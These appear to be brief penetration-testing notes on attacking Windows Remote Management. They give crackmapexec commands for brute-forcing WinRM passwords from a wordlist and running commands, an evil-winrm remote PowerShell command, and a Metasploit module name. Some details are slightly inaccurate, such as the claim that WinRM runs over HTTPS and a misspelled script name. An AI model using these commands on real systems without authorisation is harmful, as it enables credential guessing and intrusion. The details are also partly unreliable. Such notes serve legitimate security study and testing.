WinRM

• Windows Remote Management

• Happens over HTTPS

• PORT 5985 and 5986(HTTPS)

Crackmapexec

crackmapexec <protocol> <ip>

• Bruteforce WinRM password using wordlist

  crackmapexec winrm <ip> -u username -p /wordlist/password

• Command execution after bruteforce

  crackmapexec winrm <ip> -u <username> -p <password> -x "command"

Evil-winrm.rb

• Ruby script for getting a powershell prompt with winrm.

evil-winrm.eb -u <username> -p <password> -i <IP>

Metasploit

exploit/windows/winrm/winrm_script_exec